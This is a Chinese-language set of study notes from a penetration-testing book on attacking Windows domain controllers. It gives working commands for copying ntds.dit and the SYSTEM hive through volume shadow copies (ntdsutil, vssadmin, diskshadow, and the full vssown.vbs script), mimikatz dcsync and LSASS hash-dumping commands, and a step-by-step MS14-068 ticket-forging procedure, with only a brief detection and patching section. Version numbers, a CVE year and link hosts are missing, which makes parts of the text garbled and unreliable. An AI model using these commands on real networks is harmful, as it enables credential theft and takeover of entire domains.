目录

前言一、使用卷影拷贝服务提取ntds.dit1、ntdsutil.exe2、vssadmin3、vssown.vbs4、ntdsutil的IFM5、diskshadow6、防范二、导出ntds.dit中的散列值三、利用dcsync获取域散列值四、其他获取域散列值方法1、Metasploit2、vshadow.exe和QuarkPwDump.exe五、Kerberos域用户提权漏洞结语

前言

本篇继续阅读学习《内网安全攻防：渗透测试实战指南》，本章是域控制器安全，介绍了使用Kerberos域用户提权和导出ntds.dit中散列值的方法，并针对域控制器攻击提出了有效的安全建议

在实际网络环境中，攻击者渗透内网的终极目标是获取域控制器的权限，从而控制整个域

一、使用卷影拷贝服务提取ntds.dit

在活动目录中，所有的数据都被保存在ntds.dit文件中

ntds.dit是一个二进制文件，存储在DC的C:\Windows\NTDS\ntds.dit包含了域内的所有信息，可以通过分析ntds.dit导出域内的计算机信息及其他信息类似SAM文件一样，是被系统锁定的

可以用卷影拷贝服务（Volume Shadow Copy Service，VSS）提取ntds.dit，VSS本质上属于快照（snapshot）技术，主要用于备份和恢复（即使目标文件处于锁定状态）

1、ntdsutil.exe

为AD提供管理机制的命令行工具，支持Windows server //

//创建快照ntdsutil snapshot "activate instance ntds" create quit quit//加载快照ntdsutil snapshot "mount <GUID>" quit quit//复制快照中的nitds.ditcopy <加载后快照的位置> c:\tmp:ntds.dit//删除快照ntdsutil snapshot "unmount <GUID>" "delete <GUID>" quit quit

2、vssadmin

Windows 7 及 server 提供的VSS管理工具

//创建C盘的卷影拷贝vssadmin create shadow /for=c://复制ntds.ditcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\window\NTDS\ntds.dit c:\ntds.dit//删除拷贝vssadmin delete shadow /for=c: /quiet

3、vssown.vbs

Tim Tomes开发的脚本，功能类似vssadmin

脚本如下

REM Volume Shadow Copy Management from CLI.REM Part of the presentation "Lurking in the Shadows" by Mark Baggett and Tim "LaNMaSteR53" Tomes.REM Co-developed by Mark Baggett (@MarkBaggett) and Tim Tomes (@lanmaster53).Set args = WScript.Argumentsif args.Count < 1 Thenwscript.Echo "Usage: cscript vssown.vbs [option]"wscript.Echowscript.Echo " Options:"wscript.Echowscript.Echo " /list - List current volume shadow copies."wscript.Echo " /start - Start the shadow copy service."wscript.Echo " /stop - Halt the shadow copy service."wscript.Echo " /status - Show status of shadow copy service."wscript.Echo " /mode - Display the shadow copy service start mode."wscript.Echo " /mode [Manual|Automatic|Disabled] - Change the shadow copy service start mode."wscript.Echo " /create [drive_letter] - Create a shadow copy."wscript.Echo " /delete [id|*]- Delete a specified or all shadow copies."wscript.Echo " /mount [path] [device_object]- Mount a shadow copy to the given path."wscript.Echo " /execute [\path\to\file]- Launch executable from within an umounted shadow copy."wscript.Echo " /store - Display storage statistics."wscript.Echo " /size [bytes] - Set drive space reserved for shadow copies."REM build_offwscript.Echo " /build [filename] - Print pasteable script to stdout."REM no_buildREM build_onwscript.Quit(0)End IfstrComputer = "."Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")Select Case args.Item(0)Case "/list"Wscript.Echo "SHADOW COPIES"Wscript.Echo "============="Wscript.EchoSet colItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")For Each objItem in colItemsWscript.Echo "[*] ID: " & objItem.IDWscript.Echo "[*] Client accessible: " & objItem.ClientAccessibleWscript.Echo "[*] Count:" & objItem.CountWscript.Echo "[*] Device object: " & objItem.DeviceObjectWscript.Echo "[*] Differential: " & objItem.DifferentialWscript.Echo "[*] Exposed locally:" & objItem.ExposedLocallyWscript.Echo "[*] Exposed name: " & objItem.ExposedNameWscript.Echo "[*] Exposed remotely: " & objItem.ExposedRemotelyWscript.Echo "[*] Hardware assisted: " & objItem.HardwareAssistedWscript.Echo "[*] Imported: " & objItem.ImportedWscript.Echo "[*] No auto release:" & objItem.NoAutoReleaseWscript.Echo "[*] Not surfaced: " & objItem.NotSurfacedWscript.Echo "[*] No writers:" & objItem.NoWritersWscript.Echo "[*] Originating machine: " & objItem.OriginatingMachineWscript.Echo "[*] Persistent:" & objItem.PersistentWscript.Echo "[*] Plex:" & objItem.PlexWscript.Echo "[*] Provider ID: " & objItem.ProviderIDWscript.Echo "[*] Service machine:" & objItem.ServiceMachineWscript.Echo "[*] Set ID: " & objItem.SetIDWscript.Echo "[*] State:" & objItem.StateWscript.Echo "[*] Transportable: " & objItem.TransportableWscript.Echo "[*] Volume name: " & objItem.VolumeNameWscript.EchoNextwscript.Quit(0)Case "/start"Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")For Each objService in colListOfServicesobjService.StartService()Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."Nextwscript.Quit(0)Case "/stop"Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")For Each objService in colListOfServicesobjService.StopService()Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."Nextwscript.Quit(0)Case "/status"Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")For Each objService in colListOfServicesWscript.Echo "[*] " & objService.StateNextwscript.Quit(0)Case "/mode"Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")For Each objService in colListOfServicesif args.Count < 2 ThenWscript.Echo "[*] " & objService.Name & " service set to '" & objService.StartMode & "' start mode." Elsemode = LCase(args.Item(1))if mode = "manual" or mode = "automatic" or mode = "disabled" ThenerrResult = objService.ChangeStartMode(mode)Wscript.Echo "[*] " & objService.Name & " service set to '" & mode & "' start mode."ElseWscript.Echo "[*] '" & mode & "' is not a valid start mode."End IfEND IfNextwscript.Quit(errResult) Case "/create"VOLUME = args.Item(1) & ":\"Const CONTEXT = "ClientAccessible"Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")Wscript.Echo "[*] Attempting to create a shadow copy."errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)wscript.Quit(errResult)Case "/delete"id = args.Item(1)Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")For Each objItem in colItemsif objItem.ID = id ThenWscript.Echo "[*] Attempting to delete shadow copy with ID: " & iderrResult = objItem.Delete_ElseIf id = "*" ThenWscript.Echo "[*] Attempting to delete shadow copy " & objItem.DeviceObject & "."errResult = objItem.Delete_End IfNextwscript.Quit(errResult)Case "/mount"Set WshShell = WScript.CreateObject("WScript.Shell")link = args.Item(1)sc = args.Item(2) & "\"cmd = "cmd /C mklink /D " & link & " " & scWshShell.Run cmd, 2, trueWscript.Echo "[*] " & sc & " has been mounted to " & link & "."wscript.Quit(0)Case "/execute"file = args.Item(1)Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")Set objProcess = objWMIService.Get("Win32_Process")For Each objItem in colItemspath = Replace(objItem.DeviceObject,"?",".") & fileintReturn = objProcess.Create(path)if intReturn <> 0 Thenwscript.Echo "[*] Process could not be created from " & path & "."wscript.Echo "[*] ReturnValue = " & intReturnElsewscript.Echo "[!] Process created from " & path & "."wscript.Quit(0)End IfNextwscript.Quit(0)Case "/store"Wscript.Echo "SHADOW STORAGE"Wscript.Echo "=============="Wscript.EchoSet colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")For Each objItem in colItemsWscript.Echo "[*] Allocated space:" & FormatNumber(objItem.AllocatedSpace / 1000000,0) & "MB"Wscript.Echo "[*] Maximum size: " & FormatNumber(objItem.MaxSpace / 1000000,0) & "MB"Wscript.Echo "[*] Used space:" & FormatNumber(objItem.UsedSpace / 1000000,0) & "MB"Wscript.EchoNextwscript.Quit(0)Case "/size"storagesize = CDbl(args.Item(1))Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")For Each objItem in colItemsobjItem.MaxSpace = storagesizeobjItem.Put_NextWscript.Echo "[*] Shadow storage space has been set to " & FormatNumber(storagesize / 1000000,0) & "MB."wscript.Quit(0)REM build_offCase "/build"build = 1Const ForReading = 1Set objFSO = CreateObject("Scripting.FileSystemObject")Set objTextFile = objFSO.OpenTextFile("vssown.vbs", ForReading)Do Until objTextFile.AtEndOfStreamstrNextLine = objTextFile.Readlineif InStr(strNextLine,"REM build_off") = 3 Thenbuild = 0End Ifif strNextLine <> "" and build = 1 ThenstrNextLine = Replace(strNextLine,"&","^&")strNextLine = Replace(strNextLine,">","^>")strNextLine = Replace(strNextLine,"<","^<")wscript.Echo "echo " & strNextLine & " >> " & args.Item(1)End Ifif InStr(strNextLine,"REM build_on") = 3 Thenbuild = 1End IfLoopwscript.Quit(0)REM build_onEnd Select

4、ntdsutil的IFM

在使用ntdsutil创建IFM时，需要进行生成快照、加载、将ntds.dit和计算机的SAM文件复制到目标文件夹中等操作

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

然后将ntds.dit复制到c:\test\Active Directory

将SYSTEM 和SECURITY复制到c:\test\registry\

在Nishang中有个脚本Copy-VSS.ps1实现了整个过程

5、diskshadow

diskshadow.exe可以使用VSS并导出ntds.dit

微软官方出品，代码由微软签名Windows server 、、默认自带导出ntds.dit时必须在C:\Windows\system32中操作

导出ntds.dit后，可以利用reg将syste.hive转储。因为system.hive中存放着ntds.dit的秘钥，如果没有该秘钥将无法查看ntds.dit中的信息

在渗透测试中，应该先将含有需要执行的命令的文本文件写入到远程目标系统，在使用diskshadow.exe调用执行该文件，使用更为灵活，文本如下：

//设置卷影拷贝set context persistent nowriters//添加卷add volume c: alias someAlias//创建快照create//分配虚拟磁盘盘符expose %someAlias% k://复制ntds.ditexec "cmd.exe" /c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit//列出卷影拷贝list shadows all//重置reset//退出exit

6、防范

通过监控卷影拷贝服务的使用情况，可以及时发现攻击者在系统中进行的恶意操作：

监控卷影拷贝服务及任何涉及活动目录数据库文件（ntds.dit）的可疑操作行为监控System Event ID 7036（卷影拷贝服务进人运行状态的标志）的可疑实例，以及创建vssvc.exe进程的事件监控创建diskshadow.exe及相关子进程的事件监控客户端设备中的diskshadow.exe实例创建事件（除非业务需要，在Wmdows操作系统中不应该出现diskshadowexe）通过日志监控新出现的逻辑驱动器映射事件

二、导出ntds.dit中的散列值

几个工具的使用：

/libyal/libesedb/csababarta/ntdsxtract/zcgonvh/NTDSDumpEx

三、利用dcsync获取域散列值

mimikatz有个dcsync功能，可以利用卷影拷贝服务VSS直接读取ntds.dit并检索域散列值，需要域管理员权限

//导出域内所有用户名和散列值lsadump::dcsync /domain: /all /csv//导出指定用户Dm散列值lsadump::dcsync /domain: /User:Dm//转储lsass.exe进程对散列值进行dump操作privilege::debuglsadump::lsa /inject

mimikatz命令执行结果太多，无法将其完全显示出来，可以先执行log命令（会在当前目录下生成一个文本文件，用于记录mimikatz的所有执行结果）

四、其他获取域散列值方法

1、Metasploit

use auxiliary/admin/amb/psexec_ntdsgrab

2、vshadow.exe和QuarkPwDump.exe

QuarkPwDump以快速、安全、全面地读取全部域账号和域散列值

下载地址：/quarkslab/quarkspwdump

五、Kerberos域用户提权漏洞

Kerberos域用户提权漏洞（MS14-068、CVE--6324、KB3011780）

Windows R2及以前版本均受影响如果攻击者获取了域内任何一台计算机的shell权限，同时知道任意域用户的用户名、SID、密码，即可获得域管理员权限，进而控制DC，最终获取域权限

票据注入一般流程：

查看DC的补丁安装情况（systeminfo、WMIC qfe）查看用户的SID（whoami /user）生成高权限票据（ms14-068.exe）查看注入前的权限（dir \\\\DC\c$）清除内存中的所有票据（mimikatz，kerberos::purge）将高权限票据注入内存（kerberos::ptc）验证权限

一些工具：

PyKEK：/mubix/pykekimpacket中的goldenPac.pymetasploit中的ms14_068_kerberos_checksum

修复建议：

开启Windows Update手动补丁对域内账号进行控制禁止使用弱口令及时定期修改密码安装反病毒软件并及时更新病毒库

结语

主要是围绕ntds.dit的获取来的